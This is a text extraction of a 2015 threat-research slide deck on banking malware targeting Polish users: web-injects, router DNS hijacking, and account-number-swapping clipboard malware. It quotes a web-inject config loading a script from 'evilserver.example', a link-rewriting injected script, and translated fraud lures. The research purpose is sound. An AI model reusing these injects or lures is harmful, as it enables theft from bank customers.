The Polish Money Stealing Scene

2ccaa4789ccec7f42b627550271d1a57?s=47 piotrk
February 05, 2015

The Polish Money Stealing Scene



February 05, 2015


  1. The  Polish  Money  Stealing   Scene        

    Piotr  Kijewski   @piotrkijewski            29th  Jan  2015  
  2. Main  actors   •  Web-­‐inject  malware   •  Hacked  home

     routers   •  Home  grown  “middle  income”  “banking”   malware  that  introduces  new  tricks       2  
  3. SupporGng  actor   •  Classic  phishing  sGll  there   • 

    About  20  or  so  campaigns  against  Polish  banks   in  2014   •  Not  so  effecGve  against  two  factor   authenGcaGon          ….    but  they  do  collect  data   •  Widely  reported  in  media,  so  bad  PR  for  a   bank   3  
  4. CASE  STUDY  #1:  WEB-­‐INJECT   MALWARE   4  

  5. 2014/2015   •  VMZeus/KINS   •  Tinba   •  Kronos

      •  ISFB/Gozi2   5  
  6. “Man  in  the  Browser”   6  

  7. Web-­‐inject   Target  URL  :  “*/our  internet  bank/*”   data_before

       <head>   data_aeer    <body>   data_inject    <script  type=“text/javascript”  src=hhps:// evilserver.example/grabmoney.js”>   </script>   7  
  8. Rise  of  the  Inject  Scenarios   8  

  9. Cybercrime  made  easy  -­‐  ATS   9  

  10. Scenarios   •  Web-­‐inject  scenarios  are  at  the  core  of

     money   thee   •  Bad  guys  test  transacGon  systems  for   elements  that  they  can  leverage  in  scenarios   •  Bad  guys  monitor  financial  sector  news  &   events  to  adapt  scenarios   •  Goal  is  to  bypass  two  factor  authenGcaGon  by   exploiGng  the  user     10  
  11. “Erroneous  bank  transfer”   11  

  12. “Defined  bank  transfer”   12  

  13. “Defined  bank  transfer”   The Bank is changing the format

    of the account. Please confirm the operation, including the new account number should be specified as a recipient defined. New account number will be active after 7 days if the operation is not confirmed, the adoption of transfers on your account will be impossible. Please enter the code SMS number: 334 Note:  TranslaGon  reflects  original  crappy  Polish  text   13  
  14. “Insurance”   Because of the growing prevalence of fraudulent transactions

    from accounts of customers all internet bank payments must be insured. payment amount for 300000zł - free payment amount over 300000zł - 50 zł Note:  TranslaGon  reflects  original  crappy  Polish  text   14  
  15. “Cannot  idenGfy  your  computer”   The alarm system is not

    able to identify your computer. This may be due to a recent software update or a new IP address assigned by your ISP. In this case, you must authenticate the computer to avoid blocking the account. Please authorization by the token. Note:  TranslaGon  reflects  original  crappy  Polish  text   15  
  16. “Trusted  phone  number”   We are updating the phone bank

    for sms code of <insert bank name> banking system to the safety of our customers we introduce secure line connection. You need to activate the new code SMS We take care of the safety of the banking system <insert bank name> Note:  TranslaGon  reflects  original  crappy  Polish  text   16  
  17. QR  codes  anyone?   17  


  19.     19  

  20. PowerZeus/KINS   •  Started  targeGng  Polish  users  around  July  2013

      •  Combines  3  features:  webinjects  (Zeus),  plugin  API  (SpyEye),   code  injecGon  methods  used  by  Power  Loader  (Alureon)   •  Modules  downloaded  by  framework  (essenGally  what   PowerZeus  is)   •  Included  a  module  we  called  zeus-­‐dll  (encrypted  on  disk)   •  This  parGcular  instance  aimed  at  installing  the  poland.apk,   polska.apk,  e-­‐security.apk  on  an  Android   •  This  instance  used  .ru  domains  for  C&C  and  .pl  domains  for   malicous  app  distribuGon         20  
  21. Command  features  …  +  steganography   •  get  info  

    – starts  with  #,  phone  no.  somewhere  in  message   •  new  number   – starts  with  /,  phone  no.  somewhere  in  message     •  fin   – starts  with  ,   •  uninstall   –   starts  with  !     +34  668  …   21  
  22. Spanish  connecGon  …  –  turns  out  C&C  

    number  was  virtual     22  
  23. Sinkhole  stats  unique  IPs/day   Sample  date:   12/11/2013  

    Takedown  together  with  Kaspersky   23  
  24. CASE  STUDY  #3:  HOME  ROUTER   HACKS   24  

  25. iPhone  infecGon  ???   25  

  26. DNS  redirecGon       26  

  27. Scenario  1   27  

  28. Scenario  1   The  following  code  was  injected  in  downloaded

     HTML:   <script>   jQuery(document).ready(funcGon()  {   jQuery('a[href*=""]').ahr('href','hhp://ssl-­‐');   jQuery('li  p').ahr('href','hhp://ssl-­‐');   });   </script>   28  
  29. Scenario  1   29  

  30. Scenario  2   30  

  31. CASE  STUDY  #4:  BANATRIX  AND   FRIENDS   31  

  32. Bank  Account  Number  (BAN)     CCAAAAAAAABBBBBBBBBBBBBBBB     CC

     AAAA  AAAA  BBBB  BBBB  BBBB  BBBB     •  control  sum  (inline  with  IBAN  standard)   •  bank  number   •  account  number   32  
  33. VBKlip  /  Banapter   •  A  simple  piece  of  VB

     (later  variants  in  .NET)   that  alters  contents  of  Windows  clipboard.   •  Any  string  of  26  digits  (opGonally  separated  by   whitespaces)  is  changed  to  another  one.   •  Early  versions  had  the  account  number   hardcoded,  currently  it’s  updated  from  a  C2   server.   33  
  34. Demo:     hhp://         34  

  35. Nearly  500k  PLN  lost   35  

  36. Nearly  1mln  PLN  lost       hhp://­‐z-­‐konta-­‐zniknal-­‐niemal-­‐milion-­‐zlotych,507306,s.html   36

  37. Banatrix   •  Banatrix  scans  memory  of  running  processes  that

      match  iexplore.exe,  firefox.exe,  chrome.exe,  and   opera.exe.   •  Similar  to  VBKlip/Banapter,  banatrix  changes  26-­‐digit   strings  to  a  different  one.   •  Monitoring  limited  to  one  browser  process,  may   crash  browser.   37  
  38. Banatrix:  C&C  in  .onion   38  

  39. Now  with  DGA   39  

  40. Demo:     hhp://         40  

  41. Future  Winner?     •  Ransomware   –   Older  Weelsof/Reveton

     in  2011/12  had  massive   impact   –   InteresGngly,  nothing  much  since  then   –   Cryptolocker,  Cryptowall  not  really  present   •  But  it  will  be  bad  when  it  hits   41  
  42. Something  novel:  Banking  apps?   Src:  hhp://­‐mobile-­‐malware-­‐ expanding-­‐to-­‐new-­‐territories/#.VGTBZlfF95k   42

  43. The  trend  we  see:  hacking  the  mind   src:

  44.             Contact:,  

    Twiher:  @piotrkijewski,  @cert_polska_en   Web:   44